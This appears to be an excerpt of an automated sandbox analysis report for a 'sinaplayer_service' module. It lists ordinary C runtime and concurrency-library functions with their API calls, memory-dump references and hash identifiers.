                                                                                                                                                                                                    • Instruction ID: 9eed0b571e1b639298498fc2a26af32efeaa1c4cd91aaf7c0101a30152054623
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1956672354d29cfa819adfddcc213eb90ba766a1e36ab75fdacfc9527dd3864
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D751B471A0C306BBFB519F748C81B6E36A8EF19364F01552AFE249B285FB71C9109661
                                                                                                                                                                                                    Function 6D0AA6D5 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 315COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Name::operator+$NameName::
                                                                                                                                                                                                    • String ID: D6m$`anonymous namespace'
                                                                                                                                                                                                    • API String ID: 168861036-1987170193
                                                                                                                                                                                                    • Opcode ID: 077858e8476140f507d59a472f3c98313ad29143503542c7f8f58a9ae8ee2e88
                                                                                                                                                                                                    • Instruction ID: 4dbfe7ea01812c9a997f4e5493798b2a54472672c7a154274d9445bbf2220239
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 077858e8476140f507d59a472f3c98313ad29143503542c7f8f58a9ae8ee2e88
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1C12B7194434AAFEB11CFE8DC84FAEBBF8AF09304F18445AE555A7282E774A944CB50
                                                                                                                                                                                                    Function 6D0A4A40 Relevance: 33.2, APIs: 22, Instructions: 201registrytimeCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0A4A47
                                                                                                                                                                                                    • Concurrency::SchedulerPolicy::SchedulerPolicy.LIBCMT(?,00000038,6D0A6A9C,6D0948CA,0000000C,6D0A3D89,0000000C,6D0A3E4B,?,00000000,?,6D0A3A7E,?,6D0948CA), ref: 6D0A4A62
                                                                                                                                                                                                      • Part of subcall function 6D0A6F6A: ??2@YAPAXI@Z.MSVCR120(00000028,00000180,?,6D0A4A67,?,00000038,6D0A6A9C,6D0948CA,0000000C,6D0A3D89,0000000C,6D0A3E4B,?,00000000,?,6D0A3A7E), ref: 6D0A6F72
                                                                                                                                                                                                      • Part of subcall function 6D0A6F6A: memcpy.MSVCR120(00000000,?,00000028,00000028,00000180,?,6D0A4A67,?,00000038,6D0A6A9C,6D0948CA,0000000C,6D0A3D89,0000000C,6D0A3E4B,?), ref: 6D0A6F81
                                                                                                                                                                                                      • Part of subcall function 6D0A433D: ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A4382
                                                                                                                                                                                                      • Part of subcall function 6D0A433D: memset.MSVCR120(00000000,00000000,?,00000000), ref: 6D0A4392
                                                                                                                                                                                                      • Part of subcall function 6D0A433D: ??2@YAPAXI@Z.MSVCR120(0000000C,00000000,00000000,?,00000000), ref: 6D0A4399
                                                                                                                                                                                                      • Part of subcall function 6D0A433D: ??_U@YAPAXI@Z.MSVCR120(00000000,?,?,00000180,00000000,6D0A4A97), ref: 6D0A43C3
                                                                                                                                                                                                      • Part of subcall function 6D0A433D: InitializeSListHead.KERNEL32(?,?,?,00000180,00000000,6D0A4A97), ref: 6D0A43D8
                                                                                                                                                                                                      • Part of subcall function 6D0A433D: InitializeSListHead.KERNEL32(00000180,?,?,00000180,00000000,6D0A4A97), ref: 6D0A43DE
                                                                                                                                                                                                      • Part of subcall function 6D0A43FE: ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A4443
                                                                                                                                                                                                      • Part of subcall function 6D0A43FE: memset.MSVCR120(00000000,00000000,?,00000000), ref: 6D0A4453
                                                                                                                                                                                                      • Part of subcall function 6D0A43FE: ??2@YAPAXI@Z.MSVCR120(0000000C,00000000,00000000,?,00000000), ref: 6D0A445A
                                                                                                                                                                                                      • Part of subcall function 6D0A43FE: ??_U@YAPAXI@Z.MSVCR120(00000000,?,?,00000180,00000000,6D0A4AC1), ref: 6D0A4484
                                                                                                                                                                                                      • Part of subcall function 6D0A43FE: InitializeSListHead.KERNEL32(?,?,?,00000180,00000000,6D0A4AC1), ref: 6D0A4499
                                                                                                                                                                                                      • Part of subcall function 6D0A43FE: InitializeSListHead.KERNEL32(?,?,?,00000180,00000000,6D0A4AC1), ref: 6D0A449F
                                                                                                                                                                                                    • ??0_ReentrantBlockingLock@details@Concurrency@@QAE@XZ.MSVCR120(?,?,?,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A4AC7
                                                                                                                                                                                                      • Part of subcall function 6D0A5C29: __crtInitializeCriticalSectionEx.MSVCR120(?,00000000,00000180,6D0A4ACC,?,?,?,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A5C35
                                                                                                                                                                                                      • Part of subcall function 6D0A4A04: ??_U@YAPAXI@Z.MSVCR120(00000000,?,?,?,00000180,6D0A4B22), ref: 6D0A4A21
                                                                                                                                                                                                      • Part of subcall function 6D0A4A04: memset.MSVCR120(00000000,00000000,?,00000000,?,?,?,00000180,6D0A4B22), ref: 6D0A4A32
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?), ref: 6D0A4BC6
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?), ref: 6D0A4BCF
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?), ref: 6D0A4BD8
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?), ref: 6D0A4BE1
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000000), ref: 6D0A4BED
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000004,00000000), ref: 6D0A4BFA
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000007,00000004,00000000), ref: 6D0A4C08
                                                                                                                                                                                                      • Part of subcall function 6D0A58DA: __EH_prolog3.LIBCMT ref: 6D0A58E1
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000001,00000007,00000004,00000000), ref: 6D0A4C1C
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000001,00000001,00000007,00000004,00000000), ref: 6D0D2ED9
                                                                                                                                                                                                      • Part of subcall function 6D0A6F10: TlsAlloc.KERNEL32 ref: 6D0A6F16
                                                                                                                                                                                                      • Part of subcall function 6D0A3C0B: __crtCreateEventExW.MSVCR120(00000000,00000000,00000000,001F0002), ref: 6D0A3C1B
                                                                                                                                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,6D0F39D0,?,000000FF,00000000), ref: 6D0A4C60
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120 ref: 6D0A4C6E
                                                                                                                                                                                                      • Part of subcall function 6D0A3E7E: __EH_prolog3.LIBCMT ref: 6D0A3E85
                                                                                                                                                                                                      • Part of subcall function 6D0A6FED: ___crtSetThreadpoolTimer.LIBCMT ref: 6D0A7032
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0D2EE3
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6D0D2EF9
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000), ref: 6D0D2F07
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,00000000), ref: 6D0D2F0C
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6D0D2F22
                                                                                                                                                                                                    • CreateTimerQueueTimer.KERNEL32(?,00000000,6D0F3192,?,7FFFFFFF,7FFFFFFF,00000000), ref: 6D0D2F46
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0D2F54
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6D0D2F6A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Policy$Initialize$HeadList$Concurrency@@Scheduler$ElementKey@2@@Policy@Value@$??2@Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorH_prolog3LastTimermemset$CreateVersion@__crt$??0_AllocBlockingConcurrency::CriticalEventExceptionLock@details@Manager@1@ObjectPolicy::QueueReentrantRegisterResourceSectionSingleThreadpoolThrowWait___crtmemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1785735614-0
                                                                                                                                                                                                    • Opcode ID: 3718969962b9c4e3ce0ff23a60fa1c085438578a210c376e401ec81b33026698
                                                                                                                                                                                                    • Instruction ID: 6096c406952c03f8efbe40ba752cd03fa789241b2cf015980b3f1759e3735b4c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3718969962b9c4e3ce0ff23a60fa1c085438578a210c376e401ec81b33026698
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12912CB0A05646FFE748DFBAC584BE9FBA4BF09304F55422ED52C97281DB30A520CB91
                                                                                                                                                                                                    Function 6D0A15E8 Relevance: 31.8, APIs: 21, Instructions: 287COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D08104C
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004), ref: 6D0A1630
                                                                                                                                                                                                      • Part of subcall function 6D092226: malloc.MSVCR120(6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D092237
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000180,00000002,00000004), ref: 6D0A163F
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000180,00000001,00000180,00000002,00000004), ref: 6D0A164E
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000180,00000001,00000180,00000001,00000180,00000002,00000004), ref: 6D0A165D
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000101,00000001,00000180,00000001,00000180,00000001,00000180,00000002,00000004), ref: 6D0A166C
                                                                                                                                                                                                    • GetCPInfo.KERNEL32(?,?), ref: 6D0A16BC
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,?,00000100,?,000000FF,?,000000FF,?,00000000), ref: 6D0A1703
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,?,00000200,?,000000FF,?,000000FF,?,00000000), ref: 6D0A1735
                                                                                                                                                                                                    • ___crtGetStringTypeA.LIBCMT ref: 6D0A1766
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,000000FE), ref: 6D0A17B5
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,0000007F,?,?,000000FE), ref: 6D0A17C7
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,0000007F,?,?,0000007F,?,?,000000FE), ref: 6D0A17D9
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D0A1831
                                                                                                                                                                                                      • Part of subcall function 6D08ECE0: HeapFree.KERNEL32(00000000,00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D08ECF4
                                                                                                                                                                                                    • free.MSVCR120(?,?), ref: 6D0DF709
                                                                                                                                                                                                    • free.MSVCR120(?,?,?), ref: 6D0DF711
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?), ref: 6D0DF719
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$_calloc_crt$Stringmemcpy$__crt$FreeHeapInfoType___crt_malloc_crtmalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 356976373-0
                                                                                                                                                                                                    • Opcode ID: 2b38928cfd75d054c800e3741a28308003ba01db7dac290e8cd223085b10e812
                                                                                                                                                                                                    • Instruction ID: 0f6bcc045ec1e2e69fff07818a77628906453e2f897832aedacbfe356d79cb1b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b38928cfd75d054c800e3741a28308003ba01db7dac290e8cd223085b10e812
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ABB19FB0D043869BEF11CFB8C881BEEBBF9BF09304F14452DE565A7292DB75A8418B51
                                                                                                                                                                                                    Function 6D0EF89F Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 306COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0EFC19
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(000000A8), ref: 6D0EFC4A
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E754C,6D15CEE8), ref: 6D0EFC5F
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(000000A8), ref: 6D0EFC7F
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,?,?,?,?,?,000000A8), ref: 6D0EFCAB
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,?,?,?,?,?,?,?,?,000000A8), ref: 6D0EFCD9
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,000000A8), ref: 6D0EFD09
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,?,?,?,?,?,?,?,?,?,?,?,?,000000A8), ref: 6D0EFE8E
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,?,?,?,?,?,?,?,000000A8), ref: 6D0EFEBB
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 6D0EFF4C
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,000000A8), ref: 6D0EFF5E
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,?,?,000000A8), ref: 6D0EFF64
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000008,?,?,?,?,000000A8), ref: 6D0EFF6D
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000000,?,?,?,?,000000A8), ref: 6D0EFFA7
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,?,?,?,?,?,?,000000A8), ref: 6D0EFFD7
                                                                                                                                                                                                      • Part of subcall function 6D11DD30: std::exception::_Copy_str.LIBCMT(?,?,?,6D11DD23,?,?,?,6D0DB529,Attempted a typeid of NULL pointer!,6D0940D0,00000014), ref: 6D11DD49
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::exception::exception$??0exception@std@@free$??2@CleanupConcurrency::details::Copy_strExceptionH_prolog3InformationManager::ResourceThrowTopologystd::exception::_
                                                                                                                                                                                                    • String ID: count$pGroupAffinity
                                                                                                                                                                                                    • API String ID: 2906875064-3379709940
                                                                                                                                                                                                    • Opcode ID: 32050dfdb79509a64e79fc0dfa7dbdb96be2e6a1bb31713fb374f350a1a40061
                                                                                                                                                                                                    • Instruction ID: a317a7b99209b254baa857961a7ea4cfdd8ada844f36a5271f07b20bd72d4ea2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32050dfdb79509a64e79fc0dfa7dbdb96be2e6a1bb31713fb374f350a1a40061
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96C14A71D0421A8FEB14CFA9D9807EEFBF5BF48340F50856AD915AB241EB70AA41CF91
                                                                                                                                                                                                    Function 6D0EBA5F Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 269timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0EBA69
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E754C,6D15CEE8,?,0000009C,6D0EB7F8,?,00000001,00000001), ref: 6D0EBA98
                                                                                                                                                                                                      • Part of subcall function 6D0992EB: RaiseException.KERNEL32(?,?,?,6D0AC7FC,?,?,?,?,?,6D0DDA6A,?,6D0AC7FC,?,00000001), ref: 6D099333
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,0000009C,6D0EB7F8,?,00000001,00000001,?,E18D5491,00000000,6D0E923C), ref: 6D0EBAD2
                                                                                                                                                                                                    • ?wait@event@Concurrency@@QAEII@Z.MSVCR120(?,0000009C,6D0EB7F8,?,00000001,00000001,?,E18D5491,00000000,6D0E923C), ref: 6D0EBAE9
                                                                                                                                                                                                    • ??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR120(?,?,?,?,00000000,0000009C,6D0EB7F8,?,00000001,00000001,?,E18D5491,00000000,6D0E923C), ref: 6D0EBB55
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,0000009C,6D0EB7F8,?,00000001,00000001,?,E18D5491,00000000,6D0E923C), ref: 6D0EBA83
                                                                                                                                                                                                      • Part of subcall function 6D11DD30: std::exception::_Copy_str.LIBCMT(?,?,?,6D11DD23,?,?,?,6D0DB529,Attempted a typeid of NULL pointer!,6D0940D0,00000014), ref: 6D11DD49
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(6D0E923C,0000009C,6D0EB7F8,?,00000001,00000001,?,E18D5491,00000000), ref: 6D0EBBC7
                                                                                                                                                                                                    • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR120(?,?,?,?,00000000,0000009C,6D0EB7F8,?,00000001,00000001,?,E18D5491,00000000,6D0E923C), ref: 6D0EBBFA
                                                                                                                                                                                                    • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR120 ref: 6D0EBC57
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,?,?,00000000,0000009C,6D0EB7F8,?,00000001,00000001,?,E18D5491,00000000,6D0E923C), ref: 6D0EBCBA
                                                                                                                                                                                                      • Part of subcall function 6D0A3E7E: __EH_prolog3.LIBCMT ref: 6D0A3E85
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,00000001,E18D5491,00000000,6D0E923C), ref: 6D0EBCFE
                                                                                                                                                                                                      • Part of subcall function 6D0A6FED: ___crtSetThreadpoolTimer.LIBCMT ref: 6D0A7032
                                                                                                                                                                                                    • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR120(?,?,?,00000000,0000009C,6D0EB7F8,?,00000001,00000001,?,E18D5491,00000000,6D0E923C), ref: 6D0EBD1D
                                                                                                                                                                                                    • CreateTimerQueueTimer.KERNEL32(00000001,00000000,6D0EC02B,?,?,00000000,00000020,?,?,?,00000000,0000009C,6D0EB7F8,?,00000001,00000001), ref: 6D0EBD31
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,00000001), ref: 6D0EBD4B
                                                                                                                                                                                                    • ?Block@Context@Concurrency@@SAXXZ.MSVCR120(?,?,?,00000000,0000009C,6D0EB7F8,?,00000001,00000001,?,E18D5491,00000000,6D0E923C), ref: 6D0EBD67
                                                                                                                                                                                                    • Concurrency::details::MultiWaitBlock::NotifyCompletedNode.LIBCMT ref: 6D0EBD8E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency@@$std::exception::exception$Timer$?unlock@critical_section@ExceptionH_prolog3Version@$??0scoped_lock@critical_section@?wait@event@Block::Block@CompletedConcurrency::details::Context@Copy_strCreateManager@1@MultiNodeNotifyQueueQueue@details@RaiseResourceSharedThreadpoolThrowV12@@Wait___crtstd::exception::_
                                                                                                                                                                                                    • String ID: pEvents
                                                                                                                                                                                                    • API String ID: 4129581172-2498624650
                                                                                                                                                                                                    • Opcode ID: 72d352ae0db8a597dd8956d5a3dcaeefb5579cbc7718b3b80f97dcdede1aff63
                                                                                                                                                                                                    • Instruction ID: 4330d60e5d3fcb172d6e139849fc714df2a7f3b2a2ec786d2c8035919b685784
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72d352ae0db8a597dd8956d5a3dcaeefb5579cbc7718b3b80f97dcdede1aff63
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2A1CC70D0830A9FEB15CFA8C890BEEBBB5FF84384F148069E515AB251DB70A941CF61
                                                                                                                                                                                                    Function 6D0A7B2F Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 111libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformationEx,?,00000000,00000000,0000FFFF,6D0D25E8,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004), ref: 6D0A7B47
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6D0A7B4E
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,0000FFFF,6D0D25E8,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E), ref: 6D0A7B6E
                                                                                                                                                                                                    • malloc.MSVCR120(?,00000000,00000000,0000FFFF,6D0D25E8,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E), ref: 6D0A7B7F
                                                                                                                                                                                                      • Part of subcall function 6D08ED30: HeapAlloc.KERNEL32(005A0000,00000000,6D0FC0AD,00000000,?,00000000,?,6D09223C,6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000), ref: 6D08ED5D
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D206F
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,0000FFFF,6D0D25E8,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E), ref: 6D0D207B
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000000,00000001,00000000,00000000,0000FFFF,6D0D25E8,?,00000000), ref: 6D0D2093
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20B5
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20C3
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20C9
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20DF
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20ED
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20F3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
